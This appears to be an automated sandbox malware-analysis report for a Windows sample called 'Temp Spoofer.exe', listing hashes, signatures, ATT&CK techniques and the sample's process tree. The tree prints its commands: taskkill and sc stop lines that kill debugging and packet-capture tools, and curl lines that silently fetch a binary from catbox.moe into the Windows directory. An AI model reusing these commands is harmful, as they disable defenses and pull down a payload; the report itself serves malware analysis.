1a56f55639b39aff74ad6e5199f0a43e7e286bc50e51cd0f44fc17dc58e44cbb

Analysis

max time kernel
149s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-11-2024 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Temp Spoofer.exe
Size

80KB
MD5

b78426b5a12e41584e38e488cc222060
SHA1

8785d4f2d3ed6f230a00ecfbfdba9e41005dbe93
SHA256

1a56f55639b39aff74ad6e5199f0a43e7e286bc50e51cd0f44fc17dc58e44cbb
SHA512

587e00c6a777c19c457691d75ffd91b0cdc0ef675e4027e4307e4e868e2a26652d6037a3867432ce9e50d45c0c4c9615b80704d43676425fd840693d4d9c0c5f
SSDEEP

1536:t9o7JhgQHS6kEl/isGDz006OzhaK62LXlWm5SescQvgjVT2ZHW:/o1uGl/isGX06hhWm5Bscn2

Score

8^/10

evasion execution

Malware Config

Signatures

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2884 sc.exe
332 sc.exe
2396 sc.exe
2828 sc.exe
1180 sc.exe
3016 sc.exe
2016 sc.exe
700 sc.exe
2376 sc.exe
1012 sc.exe
1304 sc.exe
2892 sc.exe
556 sc.exe
2344 sc.exe

pid	process
2884	sc.exe
332	sc.exe
2396	sc.exe
2828	sc.exe
1180	sc.exe
3016	sc.exe
2016	sc.exe
700	sc.exe
2376	sc.exe
1012	sc.exe
1304	sc.exe
2892	sc.exe
556	sc.exe
2344	sc.exe

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2852	taskkill.exe
1064	taskkill.exe
1760	taskkill.exe
1716	taskkill.exe
2928	taskkill.exe
2236	taskkill.exe
2012	taskkill.exe
2444	taskkill.exe
2180	taskkill.exe
1708	taskkill.exe
1560	taskkill.exe
2596	taskkill.exe
2120	taskkill.exe
3060	taskkill.exe
1252	taskkill.exe
2648	taskkill.exe
2456	taskkill.exe
444	taskkill.exe
2812	taskkill.exe
2696	taskkill.exe
2600	taskkill.exe
1960	taskkill.exe
2428	taskkill.exe
1392	taskkill.exe
2540	taskkill.exe
1176	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Temp Spoofer.exe

pid	process
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe
2408	Temp Spoofer.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	2696	taskkill.exe
Token: SeDebugPrivilege	2600	taskkill.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	2928	taskkill.exe
Token: SeDebugPrivilege	3060	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	2444	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	444	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Temp Spoofer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2408 wrote to memory of 2684	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2684	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2684	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2728	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2728	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2728	2408	Temp Spoofer.exe	cmd.exe
PID 2684 wrote to memory of 2812	2684	cmd.exe	taskkill.exe
PID 2684 wrote to memory of 2812	2684	cmd.exe	taskkill.exe
PID 2684 wrote to memory of 2812	2684	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2988	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2988	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2988	2408	Temp Spoofer.exe	cmd.exe
PID 2988 wrote to memory of 2696	2988	cmd.exe	taskkill.exe
PID 2988 wrote to memory of 2696	2988	cmd.exe	taskkill.exe
PID 2988 wrote to memory of 2696	2988	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2612	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2612	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2612	2408	Temp Spoofer.exe	cmd.exe
PID 2612 wrote to memory of 2828	2612	cmd.exe	sc.exe
PID 2612 wrote to memory of 2828	2612	cmd.exe	sc.exe
PID 2612 wrote to memory of 2828	2612	cmd.exe	sc.exe
PID 2408 wrote to memory of 2768	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2768	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2768	2408	Temp Spoofer.exe	cmd.exe
PID 2768 wrote to memory of 2600	2768	cmd.exe	taskkill.exe
PID 2768 wrote to memory of 2600	2768	cmd.exe	taskkill.exe
PID 2768 wrote to memory of 2600	2768	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2624	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2624	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2624	2408	Temp Spoofer.exe	cmd.exe
PID 2624 wrote to memory of 2852	2624	cmd.exe	taskkill.exe
PID 2624 wrote to memory of 2852	2624	cmd.exe	taskkill.exe
PID 2624 wrote to memory of 2852	2624	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2588	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2588	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2588	2408	Temp Spoofer.exe	cmd.exe
PID 2588 wrote to memory of 2596	2588	cmd.exe	taskkill.exe
PID 2588 wrote to memory of 2596	2588	cmd.exe	taskkill.exe
PID 2588 wrote to memory of 2596	2588	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2700	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2700	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2700	2408	Temp Spoofer.exe	cmd.exe
PID 2700 wrote to memory of 1716	2700	cmd.exe	taskkill.exe
PID 2700 wrote to memory of 1716	2700	cmd.exe	taskkill.exe
PID 2700 wrote to memory of 1716	2700	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2752	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2752	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2752	2408	Temp Spoofer.exe	cmd.exe
PID 2752 wrote to memory of 2120	2752	cmd.exe	taskkill.exe
PID 2752 wrote to memory of 2120	2752	cmd.exe	taskkill.exe
PID 2752 wrote to memory of 2120	2752	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2948	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2948	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2948	2408	Temp Spoofer.exe	cmd.exe
PID 2948 wrote to memory of 2928	2948	cmd.exe	taskkill.exe
PID 2948 wrote to memory of 2928	2948	cmd.exe	taskkill.exe
PID 2948 wrote to memory of 2928	2948	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2976	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2976	2408	Temp Spoofer.exe	cmd.exe
PID 2408 wrote to memory of 2976	2408	Temp Spoofer.exe	cmd.exe
PID 2976 wrote to memory of 3060	2976	cmd.exe	taskkill.exe
PID 2976 wrote to memory of 3060	2976	cmd.exe	taskkill.exe
PID 2976 wrote to memory of 3060	2976	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 3048	2408	Temp Spoofer.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3048
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1264
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:572
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2788
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2472
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:2640
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:2916
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:2072
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:604
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2908
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2216
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2228
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3004
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1800
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1580
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:976
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2528
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1528
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1812
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2372
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1356
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1744
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:1684
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2104
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:2000
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:2360
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:664
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads